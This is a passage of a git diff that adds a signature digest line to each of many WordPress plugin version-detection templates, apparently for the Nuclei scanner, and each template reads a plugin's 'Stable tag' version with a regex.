'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207678e4bcbd37d756b2b3ed9aab7bb0668a31fe12fbfc6be64f9a92e585fe1122022100b4a4d4842a58cfe2cd9c615ecd52643c0d76424361fab433b588ffa773b4bacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..7b76198146 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f806e4044a646d2416e78137007a3331a610d7532b63449d3e11862859fafbcf022100c1e7c7f8ad7c0f95e3c184b8fc50f63294a7ccb8ecc430ca0ab1f606e4b0f60e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..570533b8ad 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8b1947e035ae9acc4a74dc35885ab1d8dba7afad3f964e6dc9e9bee39c6ef4102210096d2e38def3d16ba5c73da8bc0fe4a17a78ac219cdf5b4e9308d2005c68cdb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..4e8732400e 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204cda2599c5bf56c3922547236d778241adcdb9d9a4ba14cf0514b018856d5629022027d53e4a6b229f455bc135356783d076be0465de6cabbcfefac52d4e389ba768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..62fb7f460e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f76a76932d1a532722644e8a8b9524859349e462d24985a3361b01d904c14d1022100e7fb2b9cc7313879e4539550cafb108e22ac8a2d941e2a26845b89c36e6607eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..f52b808e9b 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d9138dfbf91b5c857c0b00af5aff27ddd5299d9d32704fab615c0325998a08902206313fa7258d031b4007e3f2e8812584e3b875f76c3119d1255b58b38a56a8ef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..82613d7364 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac8336cd85c9aebf4fd0861946e11801feeb54eeb74f0e490167b1824eaddf43022100f93b32a07aeeade0c19fdbead75a8ddf78708f89af75c737507ce9e3c5694bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..c2f996906b 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea602b78ea5d60f4220d42798df95302f030243650f8911c279f41ef560a528b022100de53a58d83ccab7aa435ac20614c0aa0fb8fb0fd68f89a7296c0638559619301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..0f7da710e1 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbbd1f4bbca95820dc10f85a372d516c809aed8325f9b2c575514f8094e9908102200f8248a11624930c4a20fd1632c47be21ae0e9c6f2f6848088566b47a60688ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..9abce49c1a 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008579d7a63822c41103565ec0199d946e8fa099170a35de4ae3534a957d9b4003022100d165faeedf78449053e67729a999055baa40113318377b0811340bebbdfdea15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..7b74e04a10 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eda1c646fd7018e849d31a62ebebe5146964b1e1d44b396bcdb9e0078952e5af022100d796cfcc4f096e381b60364c3f0d5193651d846c0f2824821bdff4ad9d7d8f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..b2c45510bb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5360c126897bcfd551d16212f3f0df5b50e42902e964ce4a726a446a912c43a022100a4b0d4afb1e4997d598e8011a0342fef9b504534d97ab8029f1dafee46046350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..ffbc6739c6 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056dbdcc2677cdefa82290c33b5a34414c83694419254064fc447822676d0d04302206ce942c320176cc6a9889dd1d0bab61b224af808d10f2cc793ac8d1d48f0c3c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..89041e366f 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b4ec5f0caec823e073fe78d2eb6e77119acda731b6e788c544cf3308643add102205663be5a7a97c97deec88316c66e2b0dde04512bc5cc85b182d135f59da9bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..2964e86a96 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c25107accc30e5064586c8101eac0fbd25c84eeb850f0e8618f230fdad96f826022100b0d5c00b6ebf52e2c3821c5f1c12442ea898334faabb7a9898ec526851687aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..221a889736 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086be3c36ec1503573c87961c176058dcdbb9a194d32d4a281219f443c2ec0c5a02203a1c3639869d6053726da8c490b2f03ec774b40c368bdae5e35e2a545a4fdc60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..dc53f45d52 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aedfbe269348ca55f79add1d6f9426ce35dfdfa0e17b42dfa038c32a91f6bf9d0220736b721be2f42ffc1bed4501c4e9925474df5af464c29c6091def8c7c0dec826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..7c5682c809 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f58c4a918ce969ce8bfedb61e85b995f4743738707cfacc28ebbcb134dc52296022100bbeaf0eebed6982a4838e0f7e31f847004320daf6d8d5546b5a0f3a9fc4a1c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..aa66ac7b4d 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a3e9ee79d7afa1078172028a520b56c322a0229a0148479daf67cef7de854c6022100ab36ceaf31eaf9bff6d4fd62744ef155a405e81b87de7cbc30f4844f695bc035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..1ef73370b2 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009cf17c2ff3f69a28d8448cc9ed094479fac11a0a85dd188433668beace03ef22022100a904e90daab1e5902ec29a787d0c9bcaa0b74221d87c4293f1c93bc667e56b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..5c797bc046 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220195aa609297a70cdec82bae43633fb248582f448e4af1497f8187914a1b901600221009484c9c537b02862d0c79cca7ee8da546ca639e6b1f5b199957c135e17624926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..6971bdb371 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ac37b06437a8c0b254a529a4b463055f0e315d165023000a0e016af055e9df102207d20fe501499e340ba7b7785c8df00f9062123540d513a72eb001aa2f7236f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..3c61f4d06d 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204bab53f66d6654eafe50dfcf335b2f7a136c20ff214ae07738fc446b631813e50221008f99bad0d6c7ef44d5682ba71adf38e2a07166d8d90224815efd8c53c884894d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..59889b409b 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210095dd914cb85c671907b9a4fb7c83d3f8986a941d6653c1442cd0a086cf7b34ac0220350c9359831911563befb47951b315e4e52c02d9ead929a7612126401944b5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..aafab90e0c 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a54ff84e61c29e924d9c86f639ebbcd6c10b5dea3a84026fe27f7e3a3ebef4b0220713f94e4d6e542c14b1ce050ad245388afd4639f25bd403c5c20bbdce01d4633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..a75dbb6236 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bf27f0e05260075398d070a1c22937ab2fc3c6b25ef06b55a919f3d1d1a5b36022100c8c67119a9497831213c4f542192f34c5b5761d2ec81dd2901fe1ce41581d3ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..cf8bcb79fd 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a95582cb64417f7b3d9cba24838eeb6b5beb21d0106891fd66d196081b55f69022034410c0d1bee8f8b523198b3f48bb23a23be33cd1b445c23eddbcdfcf46fe05b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..a2f0d91031 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008571bf75761896cc3e32c570d9439565f5c94d6657dcaef75cd3bae722c917a2022100ba3a297b12fea8616bca5ca13f251a66ebcf160e275af72410a66ece14bf3b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..80c2f00944 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001074057f1a77be07e9e11de8e89a78782b1f86321ece5d5ab8e18ccc04182780221008c9fb54968166331aabfbb8f0fabf4f22c5bba6c7afdb3d884c9b8b0eb5d6f57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..6da3057482 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203458ed2411d3e09de235ab6d9f6d1819876b4929635be8e4d63856c0344bdff3022001c6f95755b82c102fbb7190a9ae9e6c367e746d904406f3918ca3454e53f2db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..98a1a304f0 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220358b1c9c323b453c8405de4e90584ffc23835e56b1492e19d901a0c225ff5b1f02202a68f1ca88ea30ea711985873a3d60ad104361a98eb05e58ab4f549a326d7d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..36cd7e1096 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220481bb78447d72011c753efae3030e89e0a7b2f32745640891f2a727f83b3340b022100ccde27b0981bca1d208e79e25d370b5765f01b51f547e1f03e1c1c8e8c71ae1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..6d225e0c19 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100817f206b4aee61461ff7063a1a49c359c90c29754a2f9712548f8cd38d249c9c02200b9619285427d8bb72f6c476ab151cc59a21de61c3374e6a4f47ca0d9236a880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..8cd7dc3cff 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093fd63a907d04775c2fff14021ec21ea518202d68e4a508db9830dcb641d92d302203d57cd4838101055bd50e192619339931e578d79fad1acecd3a0531c7428df46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..31fd7da734 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220145abda145081cd025cafeb02ffe8b25b9c65b9ac9c79a96e869f07cd98306d2022100db4130216ed07f4d23d10854ab250c7951293a5b78ea560409ae62512276eece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..1944589cef 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c34386ad3e7d2fa05e7193708b3b615dbe85e9fa90c477420854b46cc18796a6022046926de8000180fe6eac5161ba65db86c0c1710e9857f8f0041365a0b090b6fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..86b30179af 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc065c3448bc19fb0b8c0f99f0540d32f700ad0e0c8a505f85ddef1d44beb1fe0221009ab5265d069255448d0a0e0a6e18c6e240862d65844261074378efde39ad5d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..1d9ebed7a2 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ca4f080494377da142a361ba5417ba5f737f74518054b33a289965d3ea35c12022100d1dbe68b667925d19f86589398e6940ddbbecec4259314259bcf4bc5f1c13bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..f41b3e44fb 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203fcafd0b26f9a72a6d1d034899ebff57a3c1bc1f5951265c20768b7a48543c450221009c45d0b6876e4b009b5c73bcb222f0d516dea8ac09eb58bf55db422ce3b13126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5dab1d26a9 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ddc3366b2c3c0f7a7a6fbf4cb1c7ba558be295fc6e221677897375bcdd6277e02206493a5e22d0a0aebe734fd013ffcd411792d5eb663673d8a12f04d6fef097856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..5105335118 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eab9b7c345abcfd08c15aed8507e4890648bdd01621cd54d76e0dd69318dd4eb02200687e25c24962f4a916fff062c65309248527b1723db49f30d36784ef155165a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..4015c5b404 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203af773aa9bbea5ea15f83badce9492984b30cc87f8007143e7fa84b027d9fbcc02205d398eb936ad76abf195f4b0168a22127307e23c3fb6a430ec738f9f2b19b0d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..07bda0ff37 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db5d74e31c89593d60b2178727aae452564ad04fe2b9a79fd035f69fae9dc3a402205638792de73a006b8032c8441fb43c0c72d76e348ea51abbcabf2ab2a7ac4e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..ed81ecd29e 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045cff2ed6a9f901901c8eb6b0284b49f0c2b39ae0bd78b3e0e83beb489914c75022039e60de1f1287e4750d23565bccb3cc27dbfa289e56578903c37239572665121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..294bd0577c 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d11626861d7b45ebe9804fcb12eb4ea3712ec15f19c4e612379d48ccb03358f02201e2234f580233f14f5758fcfcdc3afad8fc9b83c12e556bc1fedaf7425546cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..8d3d9c1c66 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5575ec104a1b11a642de003780d34f048577ad877ede8694bc4a94ec9c5096302203c06fac7ee82d9f4d6f436bf2c641c51e3401b48344640ff9fdcb80f8ae2b051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..dbb54d7f3d 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c274bfb75d2140d7aa77dd096356115fe6a80e13de62b239a3d41319143208c022100db4d06036be41b548995072f3d98af31d3ff253193c8c61dfe39e9bf1a707371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..b78b22021b 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4b7dfd6946b69994bddfc1729ae393915dc48e6e4aa08c314461c299fd7287f022100a584a71f72820db1becaa23b7e15df9647e3cff9778b139e220f6c6f5012e065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml 